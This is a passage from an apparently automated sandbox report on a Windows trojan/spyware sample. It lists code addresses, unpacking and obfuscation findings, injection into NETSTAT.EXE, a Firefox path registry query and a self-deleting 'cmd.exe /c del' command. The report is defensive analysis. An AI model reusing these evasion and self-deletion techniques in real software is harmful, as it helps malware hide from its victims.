0_2_00C8D078 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8940C 0_2_00C8940C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8801C 0_2_00C8801C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89410 0_2_00C89410 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8C810 0_2_00C8C810 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C88020 0_2_00C88020 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C83838 0_2_00C83838 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C83830 0_2_00C83830 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C85834 0_2_00C85834 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C885CC 0_2_00C885CC Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C885D0 0_2_00C885D0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84998 0_2_00C84998 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84995 0_2_00C84995 Source: 
C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C801BD 0_2_00C801BD Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84D58 0_2_00C84D58 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C82AD1 0_2_00C82AD1 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8F240 0_2_00C8F240 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89211 0_2_00C89211 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8022E 0_2_00C8022E Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C88BC0 0_2_00C88BC0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C80BD8 0_2_00C80BD8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C847B8 0_2_00C847B8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84BB8 0_2_00C84BB8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C847B3 0_2_00C847B3 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84BB3 0_2_00C84BB3 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C88B6C 0_2_00C88B6C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041B0DB 2_2_0041B0DB Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_004078EB 2_2_004078EB Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_004078F0 2_2_004078F0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041AB5A 2_2_0041AB5A Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419D31 2_2_00419D31 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041A742 2_2_0041A742 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0349FB40 5_2_0349FB40 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A63C2 5_2_034A63C2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0347EBE0 5_2_0347EBE0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A4B96 5_2_034A4B96 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code 
function: 5_2_034A4A5B 5_2_034A4A5B
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0354E214 5_2_0354E214
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03530A02 5_2_03530A02
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A523D 5_2_034A523D
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035422DD 5_2_035422DD
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541A99 5_2_03541A99
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034942B0 5_2_034942B0
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A594B 5_2_034A594B
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A7110 5_2_034A7110
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035419E2 5_2_035419E2
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A6180 5_2_034A6180
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0354D9BE 5_2_0354D9BE
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A1070 5_2_034A1070
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353D016 5_2_0353D016
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034AE020 5_2_034AE020
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A0021 5_2_034A0021
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A48CB 5_2_034A48CB
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035428E8 5_2_035428E8
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0348A080 5_2_0348A080
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035218B6 5_2_035218B6
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541746 5_2_03541746
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541FCE 5_2_03541FCE
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03532782 5_2_03532782
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03495790 5_2_03495790
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03497640 5_2_03497640
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A4E61 5_2_034A4E61
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353CE66 5_2_0353CE66
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A5E70 5_2_034A5E70
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A6611 5_2_034A6611
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035426F8 5_2_035426F8
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03533E96 5_2_03533E96
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03470D40 5_2_03470D40
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03531D1B 5_2_03531D1B
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03542519 5_2_03542519
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0351C53F 5_2_0351C53F
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03491530 5_2_03491530
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353D5D2 5_2_0353D5D2
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0352FDDB 5_2_0352FDDB
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03521DE3 5_2_03521DE3
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353E581 5_2_0353E581
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A547E 5_2_034A547E
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0348740C 5_2_0348740C
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03491410 5_2_03491410
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0352F42B 5_2_0352F42B
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035344EF 5_2_035344EF
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03533490 5_2_03533490
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541C9F 5_2_03541C9F
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BAB5A 5_2_032BAB5A
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032A78EB 5_2_032A78EB
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032A78F0 5_2_032A78F0
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BB0DB 5_2_032BB0DB
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0347B0E0 appears 168 times
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 034CDDE8 appears 34 times
 PE file contains strange resources
 Source: druS9vVaUK.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Source: axh0nv7nt03do.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info
 Source: druS9vVaUK.exe Binary or memory string: OriginalFilename vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000000.00000002.443094538.0000000000518000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000000.00000002.446398805.0000000002B00000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRuntimeCore.dll8 vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000002.00000002.500225053.00000000004F8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000002.00000002.503364248.000000000119F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs druS9vVaUK.exe
 Source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs druS9vVaUK.exe
 Source: druS9vVaUK.exe Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
 Searches the installation path of Mozilla Firefox
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
 Yara signature match
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
 Source: druS9vVaUK.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Source: axh0nv7nt03do.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/7@3/2
 Contains functionality to adjust token privileges (e.g. debug / backup)
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00BCA70E AdjustTokenPrivileges, 0_2_00BCA70E
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00BCA6D7 AdjustTokenPrivileges, 0_2_00BCA6D7
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Mutant created: \Sessions\1\BaseNamedObjects\VdLINVBOKOiFSfVNXuAoBmCBmda
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_01
 Creates temporary files
 PE file has an executable .text section and no other executable section
 Source: druS9vVaUK.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this application use the .NET runtime (probably coded in C#)
 Reads the hosts file
 Sample is known by Antivirus
 Source: druS9vVaUK.exe Virustotal: Detection: 33%
 Source: druS9vVaUK.exe ReversingLabs: Detection: 35%
 Spawns processes
 Source: unknown Process created: C:\Users\user\Desktop\druS9vVaUK.exe 'C:\Users\user\Desktop\druS9vVaUK.exe'
 Source: unknown Process created: C:\Users\user\Desktop\druS9vVaUK.exe {path}
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe'
 Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: unknown Process created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe'
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Process created: C:\Users\user\Desktop\druS9vVaUK.exe {path}
 Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe'
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe'
 Uses an in-process (OLE) Automation server
 Writes ini files
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Uses Microsoft Silverlight
 Checks if Microsoft Office is installed
 PE file contains a COM descriptor data directory
 Source: druS9vVaUK.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Uses new MSVCR Dlls
 Contains modern PE file flags such as dynamic base (ASLR) or NX
 Source: druS9vVaUK.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols
 Source: Binary string: netstat.pdbGCTL source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp
 Source: Binary string: netstat.pdb source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdbUGP source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.853545081.000000000356F000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE
 Source: Binary string: mscorrc.pdb source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp

### Data Obfuscation:

 Detected unpacking (changes PE section rights)
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Unpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
 Detected unpacking (overwrites its own PE header)
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Unpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack
 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_004DD405 push es; retf 0_2_004DD41F
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00BC2EED push esi; retf 0_2_00BC2EFA
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C60A35 push cs; iretd 0_2_00C60A3E
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C879E9 push esp; retf 0_2_00C87A02
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C887D9 push edi; iretd 0_2_00C887DA
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C873B4 push dword ptr [ecx+35B307F2h]; ret 0_2_00C873C9
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00414058 pushad ; retf 2_2_00414059
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419A35 push eax; ret 2_2_00419A88
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419AEC push eax; ret 2_2_00419AF2
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419A82 push eax; ret 2_2_00419A88
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419A8B push eax; ret 2_2_00419AF2
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041AEEA push eax; ret 2_2_0041AEF1
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_004BD405 push es; retf 2_2_004BD41F
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034CDE2D push ecx; ret 5_2_034CDE40
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9A35 push eax; ret 5_2_032B9A88
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9A8B push eax; ret 5_2_032B9AF2
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9A82 push eax; ret 5_2_032B9A88
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9AEC push eax; ret 5_2_032B9AF2
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BAEEA push eax; ret 5_2_032BAEF1
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BA486 pushad ; ret 5_2_032BA487
 Binary may include packed or encrypted code
 Source: initial sample Static PE infor